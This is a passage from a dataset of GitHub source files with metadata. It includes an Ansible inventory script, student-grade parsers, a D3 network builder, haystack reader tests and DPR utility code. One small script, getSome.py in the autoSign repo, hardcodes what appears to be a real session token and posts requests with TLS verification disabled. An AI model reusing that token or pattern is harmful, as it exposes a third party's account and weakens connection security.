[\"ungrouped\"]\n for tag in tags:\n if not tag in self.groups:\n self.groups[tag] = {}\n\n group = self.groups[tag]\n if not \"hosts\" in group:\n group[\"hosts\"] = []\n\n group[\"hosts\"].append(name)\n\n def output_list(self):\n inventory = {}\n for name, group in self.groups.items():\n inventory[name] = {}\n if name != \"all\":\n inventory[name][\"hosts\"] = group[\"hosts\"]\n if \"vars\" in group:\n inventory[name][\"vars\"] = group[\"vars\"]\n\n self.print_json(inventory)\n exit(0)\n\n def output_host(self, name):\n hostvars = {}\n if name in self.hosts:\n hostvars = self.hosts[name].get(\"vars\")\n\n self.print_json(hostvars)\n exit(0)\n\nif __name__ == \"__main__\":\n SimplifiedAnsibleInventory()\n"
},
{
"alpha_fraction": 0.8367347121238708,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 23.5,
"blob_id": "b897c0d72402a4b7df28e2ab451468fe711c4c7e",
"content_id": "d0e2c245cc378b39d6b04c651b1e670c4d2b85e1",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 49,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ecanuto/inventory.py",
"src_encoding": "UTF-8",
"text": "# inventory.py\nSimplified YAML Ansible inventory\n"
}
] | 2 |
entropyfeng/autoSign | https://github.com/entropyfeng/autoSign | c8b8cc53167562813d1be73e1b6d884928545bfc | 820dc3d735675adddb348bc295e7298f213a9aa1 | 266572205628d34cac95ed4477d8797b35a24483 | refs/heads/master | 2020-04-09T04:41:27.706394 | 2018-12-06T13:01:02 | 2018-12-06T13:01:02 | 160,032,300 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 11.199999809265137,
"blob_id": "e2869b3845a8d93f1587dcd68a65d7aa4b2298bb",
"content_id": "f8b6e4b2258372f0b82c42453f41fd1fe2b958b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/README.md",
"repo_name": "entropyfeng/autoSign",
"src_encoding": "UTF-8",
"text": "# autoSign\n基于python的自动签到\n### Tips\n在电脑端上运行该程序\n手机扫码登陆后,获取token\n"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7072599530220032,
"avg_line_length": 25.75,
"blob_id": "64acbaf6a324e80214cc24093c2a9d370018f633",
"content_id": "5c93748a096dbaa0ab097e8abcd335164bfce1e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 427,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 16,
"path": "/getSome.py",
"repo_name": "entropyfeng/autoSign",
"src_encoding": "UTF-8",
"text": "import requests, clientlib,urllib\nURL = \"https://www.5idream.net/activity/activity/myjoin\"\nheaders = {'dmkj_web_token':'7a61c2f75cdf47b58144c49f2d8b3862190092','x-requested-with':'XMLHttpRequest'}\nhttpsConn = None\n\n\n\ndef request_method():\n print(headers)\n response= requests.post(URL,headers = headers,verify=False)\n print(response.text)\n print(response.request.headers)\n print(response.request.body)\n\nif __name__ =='__main__':\n request_method()"
}
] | 2 |
alex-mocanu/OSSS | https://github.com/alex-mocanu/OSSS | 5b9e5655613705c68bf15311773f834ac8e67e76 | b6a92fa7d8555f29c709c98be69958625fece3f5 | 0b57969b2016a8de43f41c7012bfceba5600969d | refs/heads/master | 2020-04-27T17:28:07.890738 | 2015-06-30T08:11:34 | 2015-06-30T08:11:34 | 37,975,895 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.43478259444236755,
"alphanum_fraction": 0.45974233746528625,
"avg_line_length": 29.292682647705078,
"blob_id": "e19e90604e12f17cb97642845a0efc955129b81a",
"content_id": "200f2e6c6ab21f00c6af117d18087a8c4deafe42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 41,
"path": "/Python/note_teste.py",
"repo_name": "alex-mocanu/OSSS",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\n\n\ndef main():\n students = []\n fp = open(sys.argv[1], \"r\")\n \n for line in list(fp):\n tokens = line.strip().strip('\\'').split(',')\n if tokens[3] == \"\":\n tokens[3] = 0\n student = {\n 'test1': tokens[0].strip('\"'),\n 'test2': tokens[1].strip('\"'),\n 'liceu': tokens[2].strip('\"'),\n 'nume': tokens[3].strip('\"'),\n 'nota': int(tokens[4].strip('\"'))\n }\n students.append(student)\n \n max_grade = -1\n test1 = students[0]['test1']\n test2 = students[0]['test2']\n for s in students:\n if test1 != s['test1']:\n\n print \"Maximul de %s puncte pentru %s,%s: %s, %s\" % (max_grade, max_test1, max_test2, max_student, max_liceu)\n test1 = s['test1']\n max_grade = -1\n if max_grade < s['nota']:\n max_grade = s['nota']\n max_test1 = s['test1']\n max_test2 = s['test2']\n max_liceu = s['liceu']\n max_student = s['nume']\n\n print \"Maximul de %s puncte pentru %s,%s: %s, %s\" % (max_grade, max_test1, max_test2, max_student, max_liceu)\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.5047720074653625,
"alphanum_fraction": 0.5143160223960876,
"avg_line_length": 20.43181800842285,
"blob_id": "c64d5f4a656ec3fae680fbb2d6b0695546c1e692",
"content_id": "5b2c7bc9d7bf43e2fdd3e3d69b0dc828ffc2ab67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 943,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 44,
"path": "/Python/grades.py",
"repo_name": "alex-mocanu/OSSS",
"src_encoding": "UTF-8",
"text": "#!usr/bin/env python\n\nimport sys\n\n\ndef usage():\n print >> sys.stderr, \"Usage: python %s <filename>\" % (sys.argv[0])\n\n\ndef main():\n if len(sys.argv) != 2:\n usage()\n sys.exit(1)\n\n try:\n fp = open(sys.argv[1], \"r\")\n except IOError, e:\n print >> sys.stderr, \"Argument is not a valid filename\"\n usage()\n sys.exit(1)\n\n text = list(fp)\n line = text[0]\n minim = line.split()[3]\n minim = float(minim)\n maxim = minim\n linemin = line\n linemax = line\n for i in range(1,len(text)):\n line = text[i]\n aux = line.split()[3]\n aux = float(aux)\n if minim > aux:\n minim = aux\n linemin = line\n if maxim < aux:\n maxim = aux\n linemax = line\n\n print \"Nota cea mai mare este obtinuta de: \", linemax,\n print \"Nota cea mai mica este obtinuta de: \", linemin,\n\nif __name__ == \"__main__\":\n sys.exit(main())\n"
}
] | 2 |
neal-o-r/network-D3 | https://github.com/neal-o-r/network-D3 | 14c454909af4c1e8174c52b882c7256e2ec5405a | 71349d3755f2af1e4fdb6d8dce3be46d33330154 | 7c8091f058b1832c01d5e466ef518c3ef5eb42e8 | refs/heads/master | 2020-04-08T19:46:07.435703 | 2018-11-29T13:26:18 | 2018-11-29T13:26:18 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4971509873867035,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 20.9375,
"blob_id": "7be0b6aaf5eb8dd4f38153f8628333f2a450c267",
"content_id": "5e70f3db97fb8447783249daede8aa407da1b1a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 32,
"path": "/make_network.py",
"repo_name": "neal-o-r/network-D3",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport json\n\ndef make_network_json(df, n=100):\n \"\"\"\n takes in a df and a number of links,\n saves a json of nodes and connections to n\n \"\"\"\n col = '#000'\n top = df.sort_values(by='Frequency').tail(n)\n\n ns = {*top.K1} | {*top.K2}\n\n nodes = [{'colour':col,\n 'name':n,\n 'id': n} for n in ns]\n\n links = [{'source': t.K1,\n 'target': t.K2,\n 'value' : t.Frequency} for i, t in top.iterrows()]\n\n json.dump({'nodes':nodes, 'links':links}, open('network.json', 'w'),\n indent=4)\n\n return nodes, links\n\n\n\nif __name__ == '__main__':\n\n df = pd.read_csv('data.csv')\n n, l = make_network_json(df)\n"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "4ea37bb03f84e479466761e8c2f09a81c3d37529",
"content_id": "9c0ff2a0b78bd806993726c122f8cd33f71c4a64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 3,
"path": "/README.md",
"repo_name": "neal-o-r/network-D3",
"src_encoding": "UTF-8",
"text": "# D3 Network\n\nMWE of a D3 force directed graph \n"
}
] | 2 |
antoniolanza1996/haystack | https://github.com/antoniolanza1996/haystack | aa524cbbba3db1d56d4cc863cfce7ef18b483e5e | 074107fab98e41f569ffd8bc1b310769bbdfef75 | ff0db928b5ae956c36cde628b4c1e60e210173a4 | refs/heads/master | 2023-02-12T19:54:03.084578 | 2020-11-15T10:50:14 | 2020-11-15T10:50:14 | 292,628,288 | 1 | 1 | Apache-2.0 | 2020-09-03T16:52:36 | 2020-09-03T16:43:04 | 2020-09-03T10:37:25 | null | [
{
"alpha_fraction": 0.6730896830558777,
"alphanum_fraction": 0.6859357953071594,
"avg_line_length": 48.58241653442383,
"blob_id": "67c7b50fbc104138c5dffd609e503bfe89536b8f",
"content_id": "26054ed93545c5b38161a496a2a17a4b0aca4e2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4515,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 91,
"path": "/test/test_reader.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import math\n\nfrom haystack.database.base import Document\nfrom haystack.reader.base import BaseReader\nfrom haystack.reader.farm import FARMReader\nfrom haystack.reader.transformers import TransformersReader\n\n\n\ndef test_reader_basic(reader):\n assert reader is not None\n assert isinstance(reader, BaseReader)\n\n\ndef test_output(prediction):\n assert prediction is not None\n assert prediction[\"question\"] == \"Who lives in Berlin?\"\n assert prediction[\"answers\"][0][\"answer\"] == \"Carla\"\n assert prediction[\"answers\"][0][\"offset_start\"] == 11\n assert prediction[\"answers\"][0][\"offset_end\"] == 16\n assert prediction[\"answers\"][0][\"probability\"] <= 1\n assert prediction[\"answers\"][0][\"probability\"] >= 0\n assert prediction[\"answers\"][0][\"context\"] == \"My name is Carla and I live in Berlin\"\n assert len(prediction[\"answers\"]) == 5\n\n\ndef test_no_answer_output(no_answer_prediction):\n assert no_answer_prediction is not None\n assert no_answer_prediction[\"question\"] == \"What is the meaning of life?\"\n assert math.isclose(no_answer_prediction[\"no_ans_gap\"], -14.4729533, rel_tol=0.0001)\n assert no_answer_prediction[\"answers\"][0][\"answer\"] is None\n assert no_answer_prediction[\"answers\"][0][\"offset_start\"] == 0\n assert no_answer_prediction[\"answers\"][0][\"offset_end\"] == 0\n assert no_answer_prediction[\"answers\"][0][\"probability\"] <= 1\n assert no_answer_prediction[\"answers\"][0][\"probability\"] >= 0\n assert no_answer_prediction[\"answers\"][0][\"context\"] == None\n assert no_answer_prediction[\"answers\"][0][\"document_id\"] == None\n answers = [x[\"answer\"] for x in no_answer_prediction[\"answers\"]]\n assert answers.count(None) == 1\n assert len(no_answer_prediction[\"answers\"]) == 5\n\n# TODO Directly compare farm and transformers reader outputs\n# TODO checks to see that model is responsive to input arguments e.g. 
context_window_size - topk\n\ndef test_prediction_attributes(prediction):\n # TODO FARM's prediction also has no_ans_gap\n attributes_gold = [\"question\", \"answers\"]\n for ag in attributes_gold:\n assert ag in prediction\n\n\ndef test_answer_attributes(prediction):\n # TODO Transformers answer also has meta key\n # TODO FARM answer has offset_start_in_doc, offset_end_in_doc\n answer = prediction[\"answers\"][0]\n attributes_gold = ['answer', 'score', 'probability', 'context', 'offset_start', 'offset_end', 'document_id']\n for ag in attributes_gold:\n assert ag in answer\n\n\ndef test_context_window_size(test_docs_xs):\n # TODO parametrize window_size and farm/transformers reader using pytest\n docs = [Document.from_dict(d) if isinstance(d, dict) else d for d in test_docs_xs]\n for window_size in [10, 15, 20]:\n farm_reader = FARMReader(model_name_or_path=\"distilbert-base-uncased-distilled-squad\", num_processes=0,\n use_gpu=False, top_k_per_sample=5, no_ans_boost=None, context_window_size=window_size)\n prediction = farm_reader.predict(question=\"Who lives in Berlin?\", documents=docs, top_k=5)\n for answer in prediction[\"answers\"]:\n # If the extracted answer is larger than the context window, the context window is expanded.\n # If the extracted answer is odd in length, the resulting context window is one less than context_window_size\n # due to rounding (See FARM's QACandidate)\n # TODO Currently the behaviour of context_window_size in FARMReader and TransformerReader is different\n if len(answer[\"answer\"]) <= window_size:\n assert len(answer[\"context\"]) in [window_size, window_size-1]\n else:\n assert len(answer[\"answer\"]) == len(answer[\"context\"])\n\n # TODO Need to test transformers reader\n # TODO Currently the behaviour of context_window_size in FARMReader and TransformerReader is different\n\n\ndef test_top_k(test_docs_xs):\n # TODO parametrize top_k and farm/transformers reader using pytest\n # TODO transformers reader was crashing when tested on this\n\n docs = [Document.from_dict(d) if isinstance(d, dict) else d for d in test_docs_xs]\n farm_reader = FARMReader(model_name_or_path=\"distilbert-base-uncased-distilled-squad\", num_processes=0,\n use_gpu=False, top_k_per_sample=4, no_ans_boost=None, top_k_per_candidate=4)\n for top_k in [2, 5, 10]:\n prediction = farm_reader.predict(question=\"Who lives in Berlin?\", documents=docs, top_k=top_k)\n assert len(prediction[\"answers\"]) == top_k\n\n\n\n"
},
{
"alpha_fraction": 0.685352623462677,
"alphanum_fraction": 0.7016274929046631,
"avg_line_length": 47.043479919433594,
"blob_id": "f90ab5023448bc2174dab6ec302a2ec2b8079a2d",
"content_id": "f469aa69ff2f967ed2e48a610ba28a6c6b21f024",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 23,
"path": "/test/test_dummy_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack.database.base import Document\nimport pytest\n\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_dummy_retriever(document_store_with_docs):\n from haystack.retriever.sparse import ElasticsearchFilterOnlyRetriever\n retriever = ElasticsearchFilterOnlyRetriever(document_store_with_docs)\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename1\"]}, top_k=1)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Carla and I live in Berlin\"\n assert result[0].meta[\"name\"] == \"filename1\"\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename1\"]}, top_k=5)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Carla and I live in Berlin\"\n assert result[0].meta[\"name\"] == \"filename1\"\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename3\"]}, top_k=5)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Christelle and I live in Paris\"\n assert result[0].meta[\"name\"] == \"filename3\"\n\n"
},
{
"alpha_fraction": 0.6672862768173218,
"alphanum_fraction": 0.6701708436012268,
"avg_line_length": 41.977962493896484,
"blob_id": "75850c66e15cd906c63f487dbe794d517ab2d391",
"content_id": "dabfdcc2f827f5993d8fa1828e448f473e2c4a44",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31201,
"license_type": "permissive",
"max_line_length": 256,
"num_lines": 726,
"path": "/haystack/retriever/dpr_utils.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# Utilility functions and classes required for DensePassageRetriever\n#\n# Building upon the code (https://github.com/facebookresearch/DPR) published by Facebook research under Creative Commons License (https://github.com/facebookresearch/DPR/blob/master/LICENSE)\n# It is based on the following research work:\n# Karpukhin, Vladimir, et al. \"Dense Passage Retrieval for Open-Domain Question Answering.\" arXiv preprint arXiv:2004.04906 (2020).\n# (https://arxiv.org/abs/2004.04906)\n\nimport logging\nfrom typing import Tuple, Union, List\n\nimport gzip\nimport re\n\nimport torch\nfrom torch import nn, Tensor\n\nfrom transformers.modeling_bert import BertModel, BertConfig\nfrom transformers.file_utils import add_start_docstrings_to_callable\nfrom transformers.modeling_utils import PreTrainedModel\nfrom transformers.file_utils import add_start_docstrings\nfrom transformers.tokenization_bert import BertTokenizer, BertTokenizerFast\n\nimport logging\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple, Union\n\n\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n_CONFIG_FOR_DOC = \"DPRConfig\"\n\nDPR_CONTEXT_ENCODER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-ctx_encoder-single-nq-base\",\n]\nDPR_QUESTION_ENCODER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-question_encoder-single-nq-base\",\n]\nDPR_READER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-reader-single-nq-base\",\n]\n# CLASSES\n############\n# file_utils\n############\n\nclass ModelOutput:\n \"\"\"\n Base class for all model outputs as dataclass. Has a ``__getitem__`` that allows indexing by integer or slice (like\n a tuple) or strings (like a dictionnary) that will ignore the ``None`` attributes.\n \"\"\"\n\n def to_tuple(self):\n \"\"\"\n Converts :obj:`self` to a tuple.\n\n Return: A tuple containing all non-:obj:`None` attributes of the :obj:`self`.\n \"\"\"\n return tuple(getattr(self, f) for f in self.__dataclass_fields__.keys() if getattr(self, f, None) is not None)\n\n def to_dict(self):\n \"\"\"\n Converts :obj:`self` to a Python dictionary.\n\n Return: A dictionary containing all non-:obj:`None` attributes of the :obj:`self`.\n \"\"\"\n return {f: getattr(self, f) for f in self.__dataclass_fields__.keys() if getattr(self, f, None) is not None}\n\n def __getitem__(self, i):\n return self.to_dict()[i] if isinstance(i, str) else self.to_tuple()[i]\n\n def __len__(self):\n return len(self.to_tuple())\n\nRETURN_INTRODUCTION = r\"\"\"\n Returns:\n :class:`~{full_output_type}` or :obj:`tuple(torch.FloatTensor)` (if ``return_tuple=True`` is passed or when ``config.return_tuple=True``) comprising various elements depending on the configuration (:class:`~transformers.{config_class}`) and inputs:\n\"\"\"\n\ndef _prepare_output_docstrings(output_type, config_class):\n \"\"\"\n Prepares the return part of the docstring using `output_type`.\n \"\"\"\n docstrings = output_type.__doc__\n\n # Remove the head of the docstring to keep the list of args only\n lines = docstrings.split(\"\\n\")\n i = 0\n while i < len(lines) and re.search(r\"^\\s*(Args|Parameters):\\s*$\", lines[i]) is None:\n i += 1\n if i < len(lines):\n docstrings = \"\\n\".join(lines[(i + 1) :])\n\n # Add the return introduction\n full_output_type = f\"{output_type.__module__}.{output_type.__name__}\"\n intro = RETURN_INTRODUCTION.format(full_output_type=full_output_type, config_class=config_class)\n return intro + docstrings\n\ndef 
replace_return_docstrings(output_type=None, config_class=None):\n def docstring_decorator(fn):\n docstrings = fn.__doc__\n lines = docstrings.split(\"\\n\")\n i = 0\n while i < len(lines) and re.search(r\"^\\s*Returns?:\\s*$\", lines[i]) is None:\n i += 1\n if i < len(lines):\n lines[i] = _prepare_output_docstrings(output_type, config_class)\n docstrings = \"\\n\".join(lines)\n else:\n raise ValueError(\n f\"The function {fn} should have an empty 'Return:' or 'Returns:' in its docstring as placeholder, current docstring is:\\n{docstrings}\"\n )\n fn.__doc__ = docstrings\n return fn\n\n return docstring_decorator\n\n###########\n# modeling_outputs\n###########\n@dataclass\nclass BaseModelOutputWithPooling(ModelOutput):\n \"\"\"\n Base class for model's outputs that also contains a pooling of the last hidden states.\n\n Args:\n last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`):\n Sequence of hidden-states at the output of the last layer of the model.\n pooler_output (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, hidden_size)`):\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer and a Tanh activation function. The Linear\n layer weights are trained from the next sentence prediction (classification)\n objective during pretraining.\n\n This output is usually *not* a good summary\n of the semantic content of the input, you're often better with averaging or pooling\n the sequence of hidden-states for the whole input sequence.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n last_hidden_state: torch.FloatTensor\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\n###########\n#tokenization_dpr\n###########\n\nVOCAB_FILES_NAMES = {\"vocab_file\": \"vocab.txt\"}\n\nCONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-ctx_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\nQUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-question_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\nREADER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-reader-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\n\nCONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": 512,\n}\nQUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n 
\"facebook/dpr-question_encoder-single-nq-base\": 512,\n}\nREADER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"facebook/dpr-reader-single-nq-base\": 512,\n}\n\n\nCONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": {\"do_lower_case\": True},\n}\nQUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-question_encoder-single-nq-base\": {\"do_lower_case\": True},\n}\nREADER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-reader-single-nq-base\": {\"do_lower_case\": True},\n}\n\n\nclass DPRContextEncoderTokenizer(BertTokenizer):\n r\"\"\"\n Constructs a DPRContextEncoderTokenizer.\n\n :class:`~transformers.DPRContextEncoderTokenizer` is identical to :class:`~transformers.BertTokenizer` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizer` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = CONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = CONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = CONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRContextEncoderTokenizerFast(BertTokenizerFast):\n r\"\"\"\n Constructs a \"Fast\" DPRContextEncoderTokenizer (backed by HuggingFace's `tokenizers` library).\n\n :class:`~transformers.DPRContextEncoderTokenizerFast` is identical to :class:`~transformers.BertTokenizerFast` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizerFast` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = CONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = CONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = CONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRQuestionEncoderTokenizer(BertTokenizer):\n r\"\"\"\n Constructs a DPRQuestionEncoderTokenizer.\n\n :class:`~transformers.DPRQuestionEncoderTokenizer` is identical to :class:`~transformers.BertTokenizer` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizer` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = QUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = QUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = QUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRQuestionEncoderTokenizerFast(BertTokenizerFast):\n r\"\"\"\n Constructs a \"Fast\" DPRQuestionEncoderTokenizer (backed by HuggingFace's `tokenizers` library).\n\n :class:`~transformers.DPRQuestionEncoderTokenizerFast` is identical to :class:`~transformers.BertTokenizerFast` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizerFast` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = QUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = QUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = QUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\n\n\n##########\n# 
configuration_dpr\n##########\n\n\nDPR_PRETRAINED_CONFIG_ARCHIVE_MAP = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-ctx_encoder-single-nq-base/config.json\",\n \"facebook/dpr-question_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-question_encoder-single-nq-base/config.json\",\n \"facebook/dpr-reader-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-reader-single-nq-base/config.json\",\n}\n\n\nclass DPRConfig(BertConfig):\n r\"\"\"\n :class:`~transformers.DPRConfig` is the configuration class to store the configuration of a\n `DPRModel`.\n\n This is the configuration class to store the configuration of a `DPRContextEncoder`, `DPRQuestionEncoder`, or a `DPRReader`.\n It is used to instantiate the components of the DPR model.\n\n Args:\n projection_dim (:obj:`int`, optional, defaults to 0):\n Dimension of the projection for the context and question encoders.\n If it is set to zero (default), then no projection is done.\n \"\"\"\n model_type = \"dpr\"\n\n def __init__(self, projection_dim: int = 0, **kwargs): # projection of the encoders, 0 for no projection\n super().__init__(**kwargs)\n self.projection_dim = projection_dim\n\n##########\n# Outputs\n##########\n\n\n@dataclass\nclass DPRContextEncoderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n pooler_output: (:obj:``torch.FloatTensor`` of shape ``(batch_size, embeddings_size)``):\n The DPR encoder outputs the `pooler_output` that corresponds to the context representation.\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer. This output is to be used to embed contexts for\n nearest neighbors queries with questions embeddings.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n@dataclass\nclass DPRQuestionEncoderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n pooler_output: (:obj:``torch.FloatTensor`` of shape ``(batch_size, embeddings_size)``):\n The DPR encoder outputs the `pooler_output` that corresponds to the question representation.\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer. 
